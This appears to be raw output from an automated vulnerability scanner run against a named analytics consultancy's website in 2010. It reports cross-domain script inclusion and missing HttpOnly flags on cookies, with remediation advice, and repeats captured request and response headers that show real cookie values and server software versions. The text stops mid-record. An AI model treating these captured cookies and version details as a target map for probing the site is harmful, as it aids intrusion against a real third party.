<p>Thanks to John Henson at LunaMetrics, a fantastic <a href="http://www.lunametrics.com/" target="_blank">Google Analytics Authorized Consultant</a> ...[SNIP]... <p>See <a href="http://endellion.me.uk/info/Kintiskton.html" target="_blank">this excellent post about Kintiskton</a> ...[SNIP]... </strong><a href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740" target="_blank"><strong> ...[SNIP]... <div align="center"><a href="http://www.twitter.com/analyticspros"><img src="http://twitter-badges.s3.amazonaws.com/twitter-c.png" alt="Follow analyticspros on Twitter" /></a> ...[SNIP]... <p><a href="http://www.addthis.com/bookmark.php?v=250&pub=analyticspros" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" alt="Bookmark and Share" style="border:0" height="16" width="125" /></a> <script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=analyticspros" type="text/javascript"></script> </p> <p><a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon16x16.png" style="vertical-align:middle;border:0" /></a> <a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml">Subscribe in a reader</a> ...[SNIP]... <p>Delivered by <a href="http://feedburner.google.com" target="_blank">FeedBurner</a> ...[SNIP]... <div style="text-align: center"><a target="_blank" href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740"><img width="80" height="80" title="Analytics Pros are Google Analytics Authorized Consultants" alt="Google Analytics Certified Partners & Authorized Consultants - click to verify" src="/images/stor ...[SNIP]... <p style="text-align: center;"><iframe src="http://rcm.amazon.com/e/cm?lt1=_blank&bc1=FFFFFF&IS2=1&bg1=FFFFFF&fc1=000000&lc1=0000FF&t=analyticspros-20&o=1&p=8&l=as1&m=amazon&f=ifr&md=10FE9736YVPPT7A0FBG2&asins=0470578319" frameborder="0" scrolling="no" style="width: 120px; height: 240px;"></iframe> ...[SNIP]... </script> <script type="text/javascript" src="//s3.amazonaws.com/ki.js/8221/1kV.js" async="true"></script> ...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Analytics Prose" href="http://feeds.feedburner.com/analyticspros" /> <link rel="stylesheet" href="http://www.analyticspros.com/templates/system/css/system.css" type="text/css" /> ...[SNIP]... <!-- Start Kampyle Css --> <link rel="stylesheet" type="text/css" media="screen" href="http://cf.kampyle.com/k_button.css" /> <!-- End Kampyle Css --> ...[SNIP]... </script> <script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script> ...[SNIP]... </div> <img src="http://tracking.percentmobile.com/pixel/b7b12a36-b8e8-11de-95c9-12313900c5b8" style="background:#000000;" alt="." width="2" height="2" /> </div> ...[SNIP]... </span> based on any web server logfile, other types of logs, or the JavaScript clickstream data generated by the UTM (urchin.js or ga.js) tracking technology proprietery to <a href="http://www.urchin.com/" target="_blank">Urchin</a> and <a href="http://www.google.com/analytics/" target="_blank">Google Analytics</a> ...[SNIP]... <p>$9,995 one-time license. Includes (a full feature list is available at <a href="http://www.google.com/urchin/features.html">http://www.google.com/urchin/features.html</a> ...[SNIP]... <p>A full list of features can be viewed on the <a href="http://www.google.com/urchin/features.html" target="_blank">official Urchin Software from Google website</a> ...[SNIP]... <p>The latest version of Urchin is version 7, released August 31st, 2010. More details about Urchin can be found on the official Urchin website at <a href="http://www.google.com/urchin" target="_blank">www.google.com/urchin</a> ...[SNIP]... </strong><a href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740" target="_blank"><strong> ...[SNIP]... <div align="center"><a href="http://www.twitter.com/analyticspros"><img src="http://twitter-badges.s3.amazonaws.com/twitter-c.png" alt="Follow analyticspros on Twitter" /></a> ...[SNIP]... <p><a href="http://www.addthis.com/bookmark.php?v=250&pub=analyticspros" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" alt="Bookmark and Share" style="border:0" height="16" width="125" /></a> <script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=analyticspros" type="text/javascript"></script> </p> <p><a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon16x16.png" style="vertical-align:middle;border:0" /></a> <a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml">Subscribe in a reader</a> ...[SNIP]... <p>Delivered by <a href="http://feedburner.google.com" target="_blank">FeedBurner</a> ...[SNIP]... <div style="text-align: center"><a target="_blank" href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740"><img width="80" height="80" title="Analytics Pros are Google Analytics Authorized Consultants" alt="Google Analytics Certified Partners & Authorized Consultants - click to verify" src="/images/stor ...[SNIP]... <p style="text-align: center;"><iframe src="http://rcm.amazon.com/e/cm?lt1=_blank&bc1=FFFFFF&IS2=1&bg1=FFFFFF&fc1=000000&lc1=0000FF&t=analyticspros-20&o=1&p=8&l=as1&m=amazon&f=ifr&md=10FE9736YVPPT7A0FBG2&asins=0470578319" frameborder="0" scrolling="no" style="width: 120px; height: 240px;"></iframe> ...[SNIP]... </script> <script type="text/javascript" src="//s3.amazonaws.com/ki.js/8221/1kV.js" async="true"></script> ...[SNIP]...
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.bing.com/search?q=www.analyticspros.com&src=IE-SearchBox&Form=IE8SRC Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:48:25 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:48:26 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:48:26 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30612
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:10:25 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:10:27 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:10:27 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22891
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about/caleb-whitmore.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:08:04 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:08:05 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:08:05 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22764
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /administrator/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/robots.txt Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:55:50 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 1ee73a388da0bb7ec3d7afe3beccac53=93ba17552555ac721a5316e12acb3496; path=/ Last-Modified: Sat, 06 Nov 2010 04:55:54 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 4718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:07:31 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:07:35 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:07:36 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28794
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:14:29 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:14:30 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:14:30 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:06:43 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:06:44 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:06:44 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:49 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:36:51 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:36:51 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22044
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:13:55 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:13:56 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:13:56 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34379
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/103-google-analytics-opt-out-feature.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:50 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:36:57 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:36:57 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33480
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/106-google-analytics-health-check.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:18:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:18:37 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:18:37 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26145
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/55-googleanalytics/108-custom-variable-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 02:18:09 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 02:18:11 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 02:18:11 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22681
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
